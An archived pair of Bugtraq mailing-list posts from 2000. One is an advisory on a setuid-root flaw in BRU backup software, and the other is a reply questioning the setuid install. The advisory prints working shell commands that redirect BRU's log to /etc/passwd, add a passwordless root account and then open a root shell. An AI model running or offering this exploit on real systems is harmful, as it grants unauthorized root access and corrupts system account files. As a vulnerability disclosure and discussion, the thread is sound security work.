5169783 2000-06-07 00:32 /74 rader/ Postmaster
Mottagare: Bugtraq (import) <11185>
Ärende: BRU Vulnerability
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="------------4A45ED3ABE8DAC5121B79B82"
Message-ID: <393D6B8F.B2099152@gte.net>
Date: Tue, 6 Jun 2000 14:22:24 -0700
Reply-To: root <comsec.admin@GTE.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: root <comsec.admin@GTE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
--------------4A45ED3ABE8DAC5121B79B82
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
We have found a vulnerability in BRU during our 'Security Contest' for
our company.
The details are included.
--
Riley Hassell
Network Security
Speakeasy Networks
1-206-728-9770 ext151
1-206-917-5151 Direct Line
--------------4A45ED3ABE8DAC5121B79B82
Content-Type: text/plain; charset=us-ascii;
name="adv.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="adv.txt"
BRU backup software Vulnerability:
Description:
You can change the log file BRU uses by changing the
BRUEXECLOG environment variable. Since bru is setuid
root you can append to any file on the system.
Exploitation:
$ BRUEXECLOG=/etc/passwd
$ export BRUEXECLOG
$ bru -V '
> comsec::0:0::/:/bin/sh
> '
$ su comsec
#
Temporary fix:
Why do normal users need to run bru. ;)
--------------4A45ED3ABE8DAC5121B79B82--
(5169783) ------------------------------------------
5176859 2000-06-08 20:42 /36 rader/ Postmaster
Mottagare: Bugtraq (import) <11210>
Ärende: Re: BRU Vulnerability
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <393F3D20.BB89F298@netmor.com>
Date: Thu, 8 Jun 2000 09:28:48 +0300
Reply-To: gavrie@NETMOR.COM
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Gavrie Philipson <gavrie@NETMOR.COM>
Organization: Netmor Ltd.
X-To: root <comsec.admin@GTE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
root wrote:
> BRU backup software Vulnerability:
>
> Description:
> You can change the log file BRU uses by changing the
> BRUEXECLOG environment variable. Since bru is setuid
> root you can append to any file on the system.
Why, am I wondering, would a sane person install BRU with setuid
permissions?
That's like installing tar with setuid permissions and wondering about
overwritten files.
On my systems, BRU words fine without any setuid/setgid perms.
Gavrie.
--
Gavrie Philipson
Netmor Applied Modeling Research Ltd.
(5176859) ------------------------------------------